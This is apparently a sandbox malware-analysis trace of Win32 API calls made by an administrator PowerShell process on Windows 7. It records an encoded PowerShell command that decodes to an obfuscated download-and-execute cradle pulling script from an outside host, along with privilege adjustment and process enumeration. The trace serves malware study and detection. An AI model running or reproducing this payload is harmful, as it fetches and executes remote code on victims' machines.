	[0583.900] CoTaskMemFree (pv=0x30af90) 
	[0583.906] CoTaskMemAlloc (cb=0x104) returned 0x30af90
	[0583.906] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x30af90, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0583.906] CoTaskMemFree (pv=0x30af90) 
	[0583.908] CommandLineToArgvW (in: lpCmdLine=" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", pNumArgs=0x1c71e020 | out: pNumArgs=0x1c71e020) returned 0x2417b0*=""
	[0583.910] lstrlenW (lpString="-EncodedCommand") returned 15
	[0583.911] CoTaskMemAlloc (cb=0x22) returned 0x1b85f430
	[0583.911] RtlMoveMemory (in: Destination=0x1b85f430, Source=0x2417d2, Length=0x20 | out: Destination=0x1b85f430) 
	[0583.911] CoTaskMemFree (pv=0x1b85f430) 
	[0585.630] lstrlenW (lpString="JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==") returned 376
	[0585.630] CoTaskMemAlloc (cb=0x2f4) returned 0x1b84cf60
	[0585.630] RtlMoveMemory (in: Destination=0x1b84cf60, Source=0x2417f2, Length=0x2f2 | out: Destination=0x1b84cf60) 
	[0585.630] CoTaskMemFree (pv=0x1b84cf60) 
	[0585.631] LocalFree (hMem=0x2417b0) returned 0x0
	[0585.632] CoTaskMemAlloc (cb=0x804) returned 0x1b86e250
	[0585.632] GetConsoleTitleW (in: lpConsoleTitle=0x1b86e250, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0585.632] CoTaskMemFree (pv=0x1b86e250) 
	[0585.642] CoTaskMemAlloc (cb=0x38e) returned 0x2417b0
	[0585.642] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1c71df80*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2e4f6b0 | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessInformation=0x2e4f6b0*(hProcess=0x35c, hThread=0x344, dwProcessId=0x1788, dwThreadId=0x139c)) returned 1
	[0586.018] CoTaskMemFree (pv=0x2417b0) 
	[0586.019] CloseHandle (hObject=0x344) returned 1
	[0586.019] CoTaskMemAlloc (cb=0x3b) returned 0x32f460
	[0586.019] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c71e028, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c71e028) returned 0x4550
	[0586.020] CoTaskMemFree (pv=0x32f460) 
	[0586.023] GetCurrentProcess () returned 0xffffffffffffffff
	[0586.023] GetCurrentProcess () returned 0xffffffffffffffff
	[0586.024] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x35c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c71e108, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c71e108*=0x344) returned 1

Process:
	id = "29"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x2a3ac000"
	os_pid = "0x68c"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 165
	os_tid = 0x230

	[0368.259] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0368.893] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0368.894] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0368.894] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0368.894] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0371.234] GetVersionExW (in: lpVersionInformation=0x16df40*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x16df40*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0371.473] GetVersionExW (in: lpVersionInformation=0x16df40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x16df40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0371.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16db60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0371.487] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16dc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0371.487] GetVersionExW (in: lpVersionInformation=0x16dcb0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x16dcb0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0371.488] SetErrorMode (uMode=0x1) returned 0x1
	[0371.489] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x16de10 | out: lpFileInformation=0x16de10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0371.519] SetErrorMode (uMode=0x1) returned 0x1
	[0371.534] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x16e080 | out: lpdwHandle=0x16e080) returned 0x94c
	[0371.536] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2c372d8 | out: lpData=0x2c372d8) returned 1
	[0371.538] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x16dff8, puLen=0x16dff0 | out: lplpBuffer=0x16dff8*=0x2c37374, puLen=0x16dff0) returned 1
	[0371.541] lstrlenW (lpString="䅁") returned 1
	[0371.549] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x16df68, puLen=0x16df60 | out: lplpBuffer=0x16df68*=0x2c37450, puLen=0x16df60) returned 1
	[0371.550] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0371.552] CoTaskMemAlloc (cb=0x2e) returned 0x34d7b0
	[0371.552] lstrcpyW (in: lpString1=0x34d7b0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0371.763] CoTaskMemFree (pv=0x34d7b0) 
	[0371.763] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x16df68, puLen=0x16df60 | out: lplpBuffer=0x16df68*=0x2c374a4, puLen=0x16df60) returned 1
	[0371.763] lstrlenW (lpString="System.Management.Automation") returned 28
	[0371.763] CoTaskMemAlloc (cb=0x3c) returned 0x2897c0
	[0371.763] lstrcpyW (in: lpString1=0x2897c0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0371.763] CoTaskMemFree (pv=0x2897c0) 
	[0371.763] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x16df68, puLen=0x16df60 | out: lplpBuffer=0x16df68*=0x2c37500, puLen=0x16df60) returned 1
	[0371.763] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0371.763] CoTaskMemAlloc (cb=0x20) returned 0x34b600
	[0371.763] lstrcpyW (in: lpString1=0x34b600, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0371.763] CoTaskMemFree (pv=0x34b600) 
	[0371.764] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x16df68, puLen=0x16df60 | out: lplpBuffer=0x16df68*=0x2c37540, puLen=0x16df60) returned 1
	[0371.764] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0371.764] CoTaskMemAlloc (cb=0x44) returned 0x2897c0
	[0371.764] lstrcpyW (in: lpString1=0x2897c0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0371.764] CoTaskMemFree (pv=0x2897c0) 
	[0371.764] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x16df68, puLen=0x16df60 | out: lplpBuffer=0x16df68*=0x2c375a8, puLen=0x16df60) returned 1
	[0371.764] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0371.764] CoTaskMemAlloc (cb=0x76) returned 0x2f9990
	[0371.764] lstrcpyW (in: lpString1=0x2f9990, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0371.764] CoTaskMemFree (pv=0x2f9990) 
	[0371.764] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x16df68, puLen=0x16df60 | out: lplpBuffer=0x16df68*=0x2c37644, puLen=0x16df60) returned 1
	[0371.764] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0371.764] CoTaskMemAlloc (cb=0x44) returned 0x2897c0
	[0371.764] lstrcpyW (in: lpString1=0x2897c0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0371.764] CoTaskMemFree (pv=0x2897c0) 
	[0371.764] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x16df68, puLen=0x16df60 | out: lplpBuffer=0x16df68*=0x2c376a8, puLen=0x16df60) returned 1
	[0371.764] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0371.764] CoTaskMemAlloc (cb=0x58) returned 0x3157c0
	[0371.764] lstrcpyW (in: lpString1=0x3157c0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0371.764] CoTaskMemFree (pv=0x3157c0) 
	[0371.764] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x16df68, puLen=0x16df60 | out: lplpBuffer=0x16df68*=0x2c37724, puLen=0x16df60) returned 1
	[0371.764] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0371.764] CoTaskMemAlloc (cb=0x20) returned 0x34b600
	[0371.764] lstrcpyW (in: lpString1=0x34b600, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0371.764] CoTaskMemFree (pv=0x34b600) 
	[0371.764] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x16df68, puLen=0x16df60 | out: lplpBuffer=0x16df68*=0x2c373cc, puLen=0x16df60) returned 1
	[0371.764] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0371.764] CoTaskMemAlloc (cb=0x66) returned 0x2cc280
	[0371.764] lstrcpyW (in: lpString1=0x2cc280, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0371.764] CoTaskMemFree (pv=0x2cc280) 
	[0371.764] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x16df68, puLen=0x16df60 | out: lplpBuffer=0x16df68*=0x0, puLen=0x16df60) returned 0
	[0371.765] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x16df68, puLen=0x16df60 | out: lplpBuffer=0x16df68*=0x0, puLen=0x16df60) returned 0
	[0371.765] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x16df68, puLen=0x16df60 | out: lplpBuffer=0x16df68*=0x0, puLen=0x16df60) returned 0
	[0371.765] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x16df38, puLen=0x16df30 | out: lplpBuffer=0x16df38*=0x2c37374, puLen=0x16df30) returned 1
	[0371.766] CoTaskMemAlloc (cb=0x204) returned 0x2f4ef0
	[0371.766] VerLanguageNameW (in: wLang=0x0, szLang=0x2f4ef0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0371.767] CoTaskMemFree (pv=0x2f4ef0) 
	[0371.767] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\", lplpBuffer=0x16df88, puLen=0x16df80 | out: lplpBuffer=0x16df88*=0x2c37300, puLen=0x16df80) returned 1
	[0371.773] GetCurrentProcessId () returned 0x68c
	[0371.788] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x16ceb0 | out: lpLuid=0x16ceb0*(LowPart=0x14, HighPart=0)) returned 1
	[0371.791] GetCurrentProcess () returned 0xffffffffffffffff
	[0371.792] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x16ced0 | out: TokenHandle=0x16ced0*=0x2e0) returned 1
	[0371.793] AdjustTokenPrivileges (in: TokenHandle=0x2e0, DisableAllPrivileges=0, NewState=0x2c3ab50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0371.794] CloseHandle (hObject=0x2e0) returned 1
	[0372.018] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x68c) returned 0x2e0
	[0372.027] EnumProcessModules (in: hProcess=0x2e0, lphModule=0x2c3abb8, cb=0x200, lpcbNeeded=0x16dee8 | out: lphModule=0x2c3abb8, lpcbNeeded=0x16dee8) returned 1
	[0372.029] GetModuleInformation (in: hProcess=0x2e0, hModule=0x13f370000, lpmodinfo=0x2c3ae28, cb=0x18 | out: lpmodinfo=0x2c3ae28*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0372.030] CoTaskMemAlloc (cb=0x804) returned 0x359550
	[0372.030] GetModuleBaseNameW (in: hProcess=0x2e0, hModule=0x13f370000, lpBaseName=0x359550, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0372.030] CoTaskMemFree (pv=0x359550) 
	[0372.031] CoTaskMemAlloc (cb=0x804) returned 0x359550
	[0372.031] GetModuleFileNameExW (in: hProcess=0x2e0, hModule=0x13f370000, lpFilename=0x359550, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0372.031] CoTaskMemFree (pv=0x359550) 
	[0372.032] CloseHandle (hObject=0x2e0) returned 1
	[0372.039] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x68c) returned 0x2e0
	[0372.040] GetExitCodeProcess (in: hProcess=0x2e0, lpExitCode=0x16e018 | out: lpExitCode=0x16e018*=0x103) returned 1
	[0372.048] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12c3b088, Length=0x20000, ResultLength=0x16dfe0 | out: SystemInformation=0x12c3b088, ResultLength=0x16dfe0*=0x1f7b8) returned 0x0
	[0372.062] EnumWindows (lpEnumFunc=0x2ad66ac, lParam=0x0) returned 1
	[0373.377] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x4d0
	[0373.377] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x558
	[0373.377] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x4d0
	[0373.377] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x4d0
	[0373.377] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x4d0
	[0373.378] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x538
	[0373.378] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x4d0
	[0373.378] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x778
	[0373.378] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x778
	[0373.378] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x4d0
	[0373.378] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x4d0
	[0373.378] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x4d0
	[0373.379] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x4d0
	[0373.379] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x4d0
	[0373.379] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x4d0
	[0373.379] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x4d0
	[0373.379] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x4d0
	[0373.379] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x460
	[0373.380] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x4d0
	[0373.380] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x4d0
	[0373.380] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x10fc
	[0373.380] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xe34
	[0373.380] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xea4
	[0373.380] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x514
	[0373.380] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xe48
	[0373.381] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xbc8
	[0373.381] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xdf8
	[0373.381] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x318
	[0373.381] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xcac
	[0373.381] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x8bc
	[0373.381] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xf9c
	[0373.381] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xf48
	[0373.382] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xe40
	[0373.382] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xecc
	[0373.382] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xeb8
	[0373.382] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xe80
	[0373.382] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xe98
	[0373.382] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xe60
	[0373.382] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xee4
	[0373.383] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xf00
	[0373.383] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xdf0
	[0373.383] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xe1c
	[0373.383] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xdd0
	[0373.383] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xd94
